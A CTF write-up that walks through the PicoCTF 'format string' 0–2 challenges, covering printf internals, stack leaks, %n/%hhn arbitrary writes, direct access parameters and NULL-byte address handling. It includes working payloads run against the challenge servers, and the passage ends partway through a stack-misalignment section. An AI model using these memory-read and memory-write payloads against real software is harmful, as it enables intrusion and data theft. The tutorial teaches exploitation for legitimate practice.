[PicoCTF] Format String Attack - 0x101

Table of contents

Just another %n
Format-Type Specifier / Stackpops vs. Direct Access Parameters (NULL) / Stack Misalignments / PLT & GOT Alteration / Pwntools fmtstr() Write-up.
In the context of this article, the ASLR mechanism will be disabled for local debugging purposes:
jamarir@kali:~$ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
Format String 0
Can you use your knowledge of format strings to make the customers happy?
Program Execution
For most challenges, we first need to create a flag.txt
file for local debugging:
jamarir@kali:~$ ./format-string-0
Please create 'flag.txt' in this directory with your own debugging flag.
Once the file is created with a dummy string, the program runs as follows:
jamarir@kali:~$ echo fl4g > flag.txt
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation:
We must recommand Patrick any of the following burger: Breakf@st_Burger, Gr%114d_Cheese
, or Bac0n_D3luxe
. Recommanding Breakf@st_Burger
or Bac0n_D3luxe
does nothing particular, for instance:
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Bac0n_D3luxe
Bac0n_D3luxePatrick is still hungry!
Try to serve him something of larger size!
But recommanding Gr%114d_Cheese
surprisingly outputs Gr[107 spaces]4202954_Cheese
:
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation:
Finally, we’re left with another choice between Pe%to_Portobello
, $outhwest_Burger
, and Cla%sic_Che%s%steak
. Choosing Pe%to_Portobello
displays Pe20021600_Portobello
:
Enter your recommendation: Pe%to_Portobello
Pe20021600_Portobello
While Cla%sic_Che%s%steak
discloses the flag:
Enter your recommendation: Cla%sic_Che%s%steak
fl4g
Source Code
Let’s look at the source code to understand what happened. First, the program loads the content of flag.txt
and puts it into the flag
variable:
[...]
#define FLAGSIZE 64
char flag[FLAGSIZE];
[...]
int main(int argc, char **argv){
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag, FLAGSIZE, f);
[...]
Then, it sets a local sigsegv_handler()
function disclosing the flag, called if the program signals a SIGSEGV (segmentation fault).
[...]
void sigsegv_handler(int sig) {
printf("\n%s\n", flag);
fflush(stdout);
exit(1);
}
[...]
int main(int argc, char **argv){
[...]
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
serve_patrick();
[...]
}
[...]
Finally, it calls the serve_patrick()
function:
[...]
#define BUFSIZE 32
[...]
int on_menu(char *burger, char *menu[], int count) {
for (int i = 0; i < count; i++) {
if (strcmp(burger, menu[i]) == 0)
return 1;
}
return 0;
}
[...]
void serve_patrick() {
printf("%s %s\n%s\n%s %s\n%s",
"Welcome to our newly-opened burger place Pico 'n Patty!",
"Can you help the picky customers find their favorite burger?",
"Here comes the first customer Patrick who wants a giant bite.",
"Please choose from the following burgers:",
"Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
"Enter your recommendation: ");
fflush(stdout);
char choice1[BUFSIZE];
scanf("%s", choice1);
char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
if (!on_menu(choice1, menu1, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
} else {
printf("%s\n%s\n",
"Patrick is still hungry!",
"Try to serve him something of larger size!");
fflush(stdout);
}
}
}
This function prints the menu 1. Then, the user’s input is read and stored into choice1
. If the user’s burger is on the menu, it displays it. If the printed number of characters is more than twice BUFSIZE (i.e. 64), then we serve bob, using the same logic:
[...]
#define BUFSIZE 32
[...]
void serve_patrick() {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
[...]
void serve_bob() {
printf("\n%s %s\n%s %s\n%s %s\n%s",
"Good job! Patrick is happy!",
"Now can you serve the second customer?",
"Sponge Bob wants something outrageous that would break the shop",
"(better be served quick before the shop owner kicks you out!)",
"Please choose from the following burgers:",
"Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
"Enter your recommendation: ");
fflush(stdout);
char choice2[BUFSIZE];
scanf("%s", choice2);
char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
if (!on_menu(choice2, menu2, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
printf(choice2);
fflush(stdout);
}
}
Format String Attack & Availability Issues
printf()
Prototype
The vulnerable lines are:
int count = printf(choice1);
printf(choice2);
Indeed, processing an arbitrary user input into the format string of the printf
family functions may lead to malicious code execution:
Let’s consider the following code:
#include <stdio.h>
void main(int argc, char **argv) {
printf("%s\n", argv[1]);
printf(argv[1]);
}
Even if both printf
output the same text when we provide a standard input:
jamarir@kali:~$ ./a.out "test"
test
test
The first printf
call is secured, while the last isn’t. That’s because we gave the user control over which format-type specifiers (first argument) will be processed by the function in the last call. As the Microsoft documentation states, this is bad :(
The possible format string type specifiers are numerous and well documented. For instance, %d
displays a decimal, %.9x
displays a 9-character-precision hexadecimal, and %s
a string passed as a reference:
#include <stdio.h>
void main() {
char buf[16] = "Hey";
printf("1e37"); // Prints "1e37"
printf("%s", buf); // Prints "Hey"
printf("%d %.4x %.3p", 5, 10, 11); // Prints "5 000a 0x00b"
}
As we may see, the printf
function (and its derivatives) has at least 1 argument (the first one), being the format string (which can interpret any format specifier), and an indefinite number of references / arguments:
The first call has only 1 argument, the format string. The second has 2 arguments: the format string and a string pointer. The third has 4 arguments: the format string and the respective integers for each format string specifier.
printf()
Machine
To keep track of which format string specifier points to which argument, the printf()
machine uses an argument pointer, along with an ouput counter:
This image illustrates how the printf()
machine handles the following execution before processing the last format-type specifier %d
:
printf("a=%x,b=%d", 0x112233, 0x33);
First, the arguments are pushed onto the stack in the reverse order, and the argument pointer intially points to the top of the stack (esp
). When a format-type specifier (e.g. %x
) is encountered, the argument pointer “stack-pops” the argument (e.g. 0×112233
) and prints it accordingly.
The issue, though, is that if there are more specifiers than arguments, the argument pointer will be “stack-poping” arbitrary values that weren’t pushed in the first place. For instance, if we execute this code:
printf("a=%x,b=%d,c=%x", 0x112233, 0x33);
We obtain the following result:
jamarir@kali:~$ gcc fmt.c; ./a.out
a=112233,b=51,c=56403dd8
a
and b
points to legitimately known values pushed onto the stack, while c
has no corresponding value (as a 4th argument). But because we have a format specifier, the argument pointer does its job, and moves forward into the stack. As a result, we know that below 0×33
, the stack contains the value 0x56403dd8
.
Lost in the Strings
Back to our flag disclosure, specifying the Cla%sic_Che%s%steak
burger disclosed the flag.
Knowing that our input is interpreted as a format string, each %s
will require a string pointer as a reference. But if the argument pointer points to a value that isn’t allowed (i.e. we can’t read the string’s address region), the program will trigger a SEGFAULT, and disclose the flag through the sigsev_handler()
call:
Enter your recommendation: Cla%sic_Che%s%steak
fl4g
Therefore, 3 arbitrary stackpops were sufficient to reference a forbidden memory region.
The server-side flag is:
jamarir@kali:~$ nc mimas.picoctf.net 51219
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
ClaCla%sic_Che%s%steakic_Che(null)
picoCTF{7h[...]e6}
Format String 1
Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!
Program Execution
This program requires the creation of 2 secret menu items and a flag file for local debugging:
jamarir@kali:~$ echo AAAAAAAA > secret-menu-item-1.txt
jamarir@kali:~$ echo BBBBBBBB > secret-menu-item-2.txt
jamarir@kali:~$ echo CCCCCCCC > flag.txt
When executed, we may provide any text to be displayed back by the program, e.g. Test123
:
jamarir@kali:~$ ./format-string-1
Give me your order and I'll read it back to you:
Test123
Here's your order: Test123
Bye!
But as we might guess, providing format string specifiers are interpreted in the output:
jamarir@kali:~$ ./format-string-1
Give me your order and I'll read it back to you:
%x.%x.%x.
Here's your order: ffffd4b0.0.0.
Bye!
Thus, we know that each of our specifiers (%x.%x.%x.
here) will process values from the stack.
Source Code ?
First, the menu 1 content is stored in secret1
:
int main() {
char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];
// Read in first secret menu item
FILE *fd = fopen("secret-menu-item-1.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-1.txt' file not found, aborting.\n");
return 1;
}
fgets(secret1, 64, fd);
Same for secret2
:
// Read in second secret menu item
fd = fopen("secret-menu-item-2.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-2.txt' file not found, aborting.\n");
return 1;
}
fgets(secret2, 64, fd);
The flag is stored in flag
:
// Read in the flag
fd = fopen("flag.txt", "r");
if (fd == NULL){
printf("'flag.txt' file not found, aborting.\n");
return 1;
}
fgets(flag, 64, fd);
FInally, 1024 chars from our buffer is read:
printf("Give me your order and I'll read it back to you:\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
printf("\n");
fflush(stdout);
printf("Bye!\n");
fflush(stdout);
return 0;
Where the vulnerable code is printf(buf)
.
Format String Attack & Confidentiality Issues
The program is a 64-bit executable:
jamarir@kali:~$ file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped
So we may use the l
format-size prefix, along with the x
format-type specifier, to disclose any 8-byte slot. For example, we may disclose 30 slots as follows:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c "print'%lx-'*30")
Give me your order and I'll read it back to you:
Here's your order: 7fffffffd490-0-0-a-400-4242424242424242-7fffffff000a-7ffff7fc06c0-3-7fff00000000-7ffff7dc4938-7fffffffd6c0-7ffff7ffe680-4343434343434343-7fffffff000a-ffffd714-0-0-7fffffffd830-7ffff7ffe680-7ffff7ff285d-4141414141414141-7fffffff000a-3de00ec7-7ffff7fd15dc-1-7fffffffd830-0-0-2d786c252d786c25-
Bye!
Interestingly, we see that:
The 6th stackpop slot contains our menu 1 (
B...B
, displayed as0×42...42
).The 14th stackpop slot contains our flag (
C...C
, displayed as0×43...43
).The 22th stackpop slot contains our menu 2 (
A...A
, displayed as0×41...41
).
We want to get the flag. So it must be in the 14th slot server-side, which we can disclose in the hexadecimal form:
jamarir@kali:~$ nc mimas.picoctf.net 51028 <<<$(python2 -c "print'%lx-'*14")
Give me your order and I'll read it back to you:
Here's your order: 402118-0-7d9c8b66fa00-0-1891880-a347834-7ffcfd6dc0e0-7d9c8b460e60-7d9c8b6854d0-1-7ffcfd6dc1b0-0-0-7b4654436f636970-
Bye!
Putting the last slot hexadecimal into CyberChef (endianness considered) discloses the string picoCTF{
. Looking at the next slots:
jamarir@kali:~$ nc mimas.picoctf.net 51028 <<<$(python2 -c "print'%lx-'*20")
Give me your order and I'll read it back to you:
Here's your order: 402118-0-70a4a6267a00-0-1ee9880-a347834-7fff414c5d70-70a4a6058e60-70a4a627d4d0-1-7fff414c5e40-0-0-7b4654436f636970-355f31346d316e34-3478345f33317937-31395f673431665f-7d653464663533-7-70a4a627f8d8-
We see that the penultimate slot is -7-
alone. Then it is padded with NULL bytes, meaning our flag is stored before, from the 14th slot:
7b4654436f636970-355f31346d316e34-3478345f33317937-31395f673431665f-7d653464663533
Decoding each slot individually gives the flag picoCTF{4n[...]4e}
.
Direct Access Parameter ? %N$ ?
An interesting feature we’ll exploit afterwards is the %N$
prefix specifier (aka. the Direct Access Parameter). This specifier allows to retrieve a slot’s content directly, without having the use dummy format string specifiers to perform multiple stackpops:
In our vulnerable program for example, knowing that the flag is the 14th stack slot of the argument pointer, we can access it directly using %14$lx
:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c 'print"%14$lx"')
Give me your order and I'll read it back to you:
Here's your order: 4343434343434343
Bye!
As a side note, however, if we want the 15th from there, we must either perform multiple stackpops, or use the
%15$lx
specifier. Indeed, adding a%lx
afterward is still pointing to the first argument pointer’s stack slot:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c 'print"%14$lx-"+"%lx-"+"%1$lx"') Give me your order and I'll read it back to you: Here's your order: 4847464544434241-7fffffffd4b0-7fffffffd4b0 Bye!
Format String 2
This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!
Program Execution
Executing the program outputs our input as usual:
jamarir@kali:~$ echo flagusator > flag.txt
jamarir@kali:~$ ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
HEY!
Here's your input: HEY!
sus = 0x21737573
You can do better!
Source Code
First, the program initializes a variable named sus
:
int sus = 0x21737573;
Then, it fills buf
with our input:
int main() {
char buf[1024];
char flag[64];
printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your input: ");
printf(buf);
printf("\n");
fflush(stdout);
Again, the vulnerable code is the printf(buf)
.
Format String Attack & Integrity Issues
Write What / Where ?
The sus
variable being set globally, it must be defined in the data segment, known as the .data
section. The executable’s sections might be shown via objdump
:
jamarir@kali:~$ objdump -s vuln
[...]
Contents of section .data:
404050 00000000 00000000 00000000 00000000 ................
404060 73757321 sus!
[...]
As we can see, sus
is located at address 0x404060
. Also, that section is writable, as it doesn’t have the READONLY flag, such as the .text
section:
jamarir@kali:~$ objdump -h vuln
[...]
14 .text 00000206 0000000000401110 0000000000401110 00001110 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
[...]
24 .data 00000014 0000000000404050 0000000000404050 00003050 2**3
CONTENTS, ALLOC, LOAD, DATA
[...]
Our purpose is to set sus
to 0x67616c66
to disclose the flag:
[...]
if (sus == 0x67616c66) {
printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
// Read in the flag
FILE *fd = fopen("flag.txt", "r");
fgets(flag, 64, fd);
printf("%s", flag);
fflush(stdout);
}
[...]
So we wanna write 0x67616c66
into 0x404060
.
Notice that when comparing
sus
with0x67616c66
, we see in gdb thatsus
is stored atrip + 0x2de7
:
jamarir@kali:~$ objdump -M intel -d vuln [...] 40126e: e8 6d fe ff ff call 4010e0 <fflush@plt> 401273: 8b 05 e7 2d 00 00 mov eax,DWORD PTR [rip+0x2de7] # 404060 <sus> 401279: 3d 66 6c 61 67 cmp eax,0x67616c66 [...]
In particular, in the
401273
’s instruction,rip
’s value is actually401279
, i.e. the next instruction address. Indeed, when breakpointed at*main+125 = 401273
:
=> 0x0000000000401273 <+125>: mov eax,DWORD PTR [rip+0x2de7] # 0x404060 <sus>
sus
is actually at offset +6 fromrip
, which is the next instruction:401279
.
(gdb) x $rip + 0x2de7 + 6 0x404060 <sus>: 0x21737573 (gdb) x 0x401279 + 0x2de7 0x404060 <sus>: 0x21737573
Write How ? %n ? %hn ? %hhn ?
So we want to write 0x67616c66
in 0x404060
. One crucial format-type specifier is %n
. This specifier writes the printed output’s size into the argument given as a reference. For instance, the second printf()
writes 4 into i
:
#include <stdio.h>
void main(int argc, char **argv) {
int i = 1;
printf("%d", i); // Prints "1"
printf("AAAA%nBBBB", &i); // Prints "AAAABBBB"
printf("%d", i); // Prints "4"
}
That’s because when %n
is processed by the printf()
machine, the output’s size is 4: AAAA
. Even if we print BBBB
afterwards, our output’s size, so far, is 4.
Another interesting information to bear in mind is that %n
outputs nothing. Therefore, it doesn't increase the printf()
machine’s counter. In other words, the following code will write 4 (AAAA
), then 7 (AAAABBB
), into i
:
#include <stdio.h>
void main() {
int i = 1;
printf("%d", i); // Prints "1"
printf("AAAA%nBBB%nB", &i, &i); // Prints "AAAABBBB"
printf("%d", i); // Prints "7"
}
Why such %n
specifier exists in the first place ? ¯\_(ツ)_/¯
It is even disabled by default in Visual Studio:
The number of bytes written depends on the prefix size used with the %n
format-type.
%n
writes 4 bytes in memory.%hn
writes 2 bytes in memory.%hhn
writes 1 byte in memory.
To better understand, let’s consider the following code:
#include <stdio.h>
void main() {
int i = 0x99999999;
printf("%.4919x%hhn", 0, &i); // i = 0x99999937
printf("%.4919x%hn", 0, &i); // i = 0x99991337
printf("%.4919x%n", 0, &i); // i = 0x00001337
}
First, we initialize i
to 0×99999999
. Then, we perform 3 writes of different sizes: 1, 2 and 4 bytes respectively. Because we’re outputting the integer 0
with a precision of 0×1337 = 4919
digits, we’re then overwritting i
to:
0x99999937
, where 1 byte is written with%hhn
.0x99991337
, where 2 bytes are written with%hn
.0x00001337
, where 4 bytes are written with%n
. Again, because%n
is writting on 4 bytes, writting0×1337
implicitely means we’re overwritting0×00001337
.
One final thing to bear in mind is that we can’t (or at least, don’t want to) write a tremendously big number of characters in the output. For instance, let’s say we wanna write 0x67616c66
into 0x404060
. So we’d have to output bearly 1.7B characters (0x67616c66 = 1.734.437.990
), often leading to system crashes:
Even if modern systems are likely to be able to print such number of characters, it’s not an efficient approach.
The following code effectively overwrites
i
to0×67616c66
, but required almost 2 minutes to run:
#include <stdio.h> void main() { int i = 0; printf("%.1734437990x%n", 0, &i); // Outputs 1.7B chars printf("%lp", i); // Prints "0x67616c66" }
jamarir@kali:~$ time ./a.out 000[...]000x67616c66./a.out 3.71s user 13.79s system 17% cpu 1:42.37 total
A better approach is instead to overwrite each byte of our address’s content with the appropriate values. Taking into account that the outputted buffer can only increase in size, if we want to write 0×67616c66
into 0x404060
, we’ll have to print:
jamarir@kali:~$ python -c 'print(f"+{0x66} -> +{0x6c - 0x66} -> +{0x161 - 0x6c} -> +{0x167 - 0x161}")'
+102 -> +6 -> +245 -> +6
0×66 = 102
characters in the output, and use%hhn
against0x404060
. The output’s size being 0 so far, we’ll add 102 characters.0×6c = 108
characters in the output, then use%hhn
against0x404061
. The output’s size being 102 so far, we’ll add 6 characters.0×161 = 353
characters in the output, then use%hhn
against0x404062
. The output’s size being 108 so far, we’ll add 245 characters.0×167 = 359
characters in the output, then use%hhn
against0x404063
. The output’s size being 353 so far, we’ll add 6 characters.
Notice how
0×161
(resp.0×167
) are used to write0×61
(resp.0×67
) in the lower byte of0×404062
(resp.0×404063
). That’s because we already printed 108 (resp. 353) characters so far, and the output size can only increase. Because we can’t decrease that counter to0×61 = 97
(resp.0×67 = 103
), we add an extra-1 that’ll be ignored by%hhn
anyway.
For instance, the following code is an upgraded version of our above code:
#include <stdio.h>
void main() {
int i = 0;
printf("%102c%1$hhn%6c%2$hhn%245c%3$hhn%6c%4$hhn", &i, (char*)&i+1, (char*)&i+2, (char*)&i+3);
printf("%lp", i); // Prints 0x67616c66
}
Notice that we changed the format-type specifier from
%.Nx
to%Nc
. That’s because%.Nx
is printing a minimum number of character. For example, see the followingprintf
calls:
#include <stdio.h> void main() { int i = 0x41000041; printf("%.2x %.8x", i, i); // Prints "41000041 41000041" (17 chars), which is more than what we want (2+1+8 chars). printf("%2c %8c", i, i); // Prints " A A" (11 chars), which is exactly what we want (2+1+8 chars). }
The first call outputs 17 characters, even if we wanted exactly 11 characters (
"%.2x %.8x"
). The second call outputs 11 characters, which is exactly what we wanted ("%2c %8c"
).Thus,
%Nc
gives us exact control over the output’s size.
Stackpops & NULL addr ??
Standard Stackpops Overwritting
When exploiting a format string vulnerability, a standard method to write arbitrary data into an address is to use the stackpop method, which goes as follows:
Find out how many stackpops are needed to reach the beginning of our input.
Put the addresses to write at the beginning of our input, prefixed with dummy junk strings. These prefixed junks are used to be referenced by the next
%Nc
format-type specifiers.Build the magical
%Nc
incremental calculations and respective%hhn
, while taking into account the initial output’s size printed (text, stackpops, junk strings).
So our input will be as follows:
For example, let’s compile the following vulnerable 32-bit program:
#include <stdio.h>
#include <string.h>
void main() {
int i = 0;
char buf[100];
scanf("%s", buf);
printf(buf);
printf("\ni=%p is at %p", i, &i);
}
jamarir@kali:~$ gcc -m32 fmt.c; ./a.out test
test
i=(nil) is at 0xffffcdcc
ASLR is disabled, so we know i
will stay at location 0xffffcdcc
. Its content is NULL (printed (nil)
by printf
). Let’s say we wanna write 0×40504030
into i
. So the methodology is:
Find out how many stackpops are required. In my case, 6 stackpops are required to reach the input’s start (
AAAA = 0×41414141
):jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"AAAA"+"%lx-"*6') AAAABBBBffffcd68-5655521c-565561b4-f7ffdb8c-1-41414141- i=(nil) is at 0xffffcdcc
Put the addresses to be overwritten at the beginning of our string, i.e.
0xffffcdcc
,0xffffcdcd
,0xffffcdce
and0xffffcdcf
in little-endian, prefixed with junk strings (e.g.AAAA
):jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"') AAAAAAAAAAAA i=(nil) is at 0xffffcdcc
Build the magical
%Nc
incremental calculations and respective%hhn
. But:We first need to know how many bytes will be in the output after 5 stackpops. For that, we’ll use
%1c
as stackpops (which totals 5 bytes), added to our 4 addresses (which totals 16 bytes) and the prefixed junk strings"AAAA" * 3
(which totals 12 bytes). In total, we have5 + 16 + 12 = 33 = 0×21
characters when the firsti
’s byte is written, using%hhn
accordingly:jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%1c"*5+"%hhn"') AAAAAAAAAAAAh i=0x21 is at 0xffffcdcc
It could be noted that we can’t print zero character in the output with our format string specifier. Indeed,
%0c
still increments the output counter by 1 character, which results in the samei = 0×21
as above:jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%0c"*5+"%hhn"') AAAAAAAAAAAAh i=0x21 is at 0xffffcdcc
Also, if the exploited program prefixes some texts before our input (e.g.
"Your name: %s"
), the first 11 characters would have to be taken into consideration.If we remove the last
%1c
(that’ll be replaced by the first%Nc
calculation below), the output’s size becomes0×20 = 32
. Then, to write0×40504030
into0xffffcdcc
, we’ll print:jamarir@kali:~$ python -c 'print(f"+{0x30} -> +{0x40 - 0x30} -> +{0x50 - 0x40} -> +{0x140 - 0x50}")' +48 -> +16 -> +16 -> +240
0×30 = 48
characters in the output, and use%hhn
against0xffffcdcc
. The output’s size being 32 so far, we’ll add 16 characters.0×40 = 64
characters in the output, and use%hhn
against0xffffcdcd
. The output’s size being 48 so far, we’ll add 16 characters.0×50 = 80
characters in the output, and use%hhn
against0xffffcdce
. The output’s size being 64 so far, we’ll add 16 characters.0×140 = 320
characters in the output, and use%hhn
against0xffffcdcf
. The output’s size being 80 so far, we’ll add 240 characters.
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%1c"*4+"%16c%hhn"+"%16c%hhn"+"%16c%hhn"+"%240c%hhn"')
AAAAAAAAAAAAh A A A
i=0x40504030 is at 0xffffcdcc
What about NULL bytes in the address ?
The issue with our stackpop technique is that if the address we wanna overwrite contains NULL bytes, we’re stuck. In our CTF, the sus
's address is 0x404060
, i.e. 0x00.00.00.00.00.40.40.60
as an 8-byte slot. So knowing that 14 stackpops are required to reach our input:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AAAAAAAA"+"%lx-"*14')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAAAAAAA7fffffffd520-[...]-0-4141414141414141-
sus = 0x21737573
You can do better!
Putting the address at the beginning will terminate our string, which breaks our payload:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"\x60\x40\x40\x00\x00\x00\x00\x00"+"%lx-"*14')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: `@@
sus = 0x21737573
You can do better!
Where our processed string input is \x60\x40\x40\x00 = "`@@"
alone.
It can be noted that using only
0x404060
(without NULL bytes) isn’t sufficient, as the stack slot’s size is 8 bytes, which will be filled with our string:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"\x60\x40\x40"+"%lx-"*14') You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say? Here's your input: `@@7fffffffd520-0-[...]-0-252d786c25404060- sus = 0x21737573 You can do better!
We wanted the slot containing our address to be
404060
alone, NOT252d786c25404060
(0x252d786c25 -> "%lx-%"
).
So, how to write on NULL bytes addresses ?
Direct Access Parameter & NULL addr !!
Suffixing Addresses’ NULLs is okay
After endless reading (here, here, or here), some workarounds exist when the address to alter contains NULL bytes:
If a unique NULL byte is in the lower byte only, then we may we shift the writting to the previous adjacent address (
\x00 - 1
instead of\x00
). For example, if we wanted to write0x30
into an\x00
address with%hhn
, we could instead write\x30??
into the previous\xff
address with%hn
(where??
will be the content of the corrupted previous byte):Otherwise, we might put the addresses at the end of our payload, and use the Direct Access Parameter to reference them using
%N$hhn
.
We’re in the second scenario above. Such Direct Access Parameter format string payloads might be less portable (especially for old systems not supporting such %N$
specifier), but that’s our only possibility.
Again, our input starts at slot 14, so we might prefix a dummy string and use the Direct Access Parameter specifier to check our input is indeed at that slot:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AAAAAAAA"+"-%14$lx-"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAAAAAAA-4141414141414141-
sus = 0x21737573
You can do better!
Also, let’s suffix our address at the end, and check we can access it accordingly:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%14$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 4060786c24343125`@@
sus = 0x21737573
You can do better!
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 40`@@
sus = 0x21737573
You can do better!
Hmm… As we can see, the 14th slot contains our format string in hexadecimal (0x786c24343125 -> "%14$lx"
) with parts of our address (0x4060
), while the next slot contains the other part of our address (0×40
). Because we want the address to be in its own slot alone (for it to be referenced by %N$hhn
), we can add 2 dummy characters "AA"
at the beginning of our string to push the first 2 bytes of the address further:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AA"+"%15$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AA404060`@@
sus = 0x21737573
You can do better!
Now, our first address is correctly aligned, and in its slot (0x404060
) ! Then, we can suffix the other 3 addresses to write sus
. For instance, the 17th slot will contain 0x404062
:
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"AA"+"%17$lx"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AA404062`@@
sus = 0x21737573
You can do better!
Notice that our NULL bytes at the end of our string are effectively pushed onto the stack. They’re not terminating our payload fortunately.
Stack Misalignments
Another thing to bear in made while writting into sus
is to make sure, everytime we’re constructing our payload, that our 4 addresses at the end are exactly in their respective slots.
As we saw just above, we needed to prefix "AA"
for the addresses to be correctly stack-aligned. That’s because the number of characters in "AA%17$lx"
is a multiple of the size of a slot (8 * 1
).
For instance, let’s say we wanna write a dummy value into the first address of sus
(in the 15th slot). For that, we’ll use the %15$hhn
specifier:
amarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$hhn"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
[1] 379019 segmentation fault ./vuln <<<
We have a segmentation fault :(
We may confirm that it’s an address issue not being stack-aligned by changing %15$hhn
to %15$lx-
(which are the same sizes):
jamarir@kali:~$ ./vuln <<<$(python2 -c 'print"%15$lx-"+"\x60\x40\x40\x00\x00\x00\x00\x00"+"\x61\x40\x40\x00\x00\x00\x00\x00"+"\x62\x40\x40\x00\x00\x00\x00\x00"+"\x63\x40\x40\x00\x00\x00\x00\x00"')
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 6100000000004040-`@@
sus = 0x21737573
You can do better!
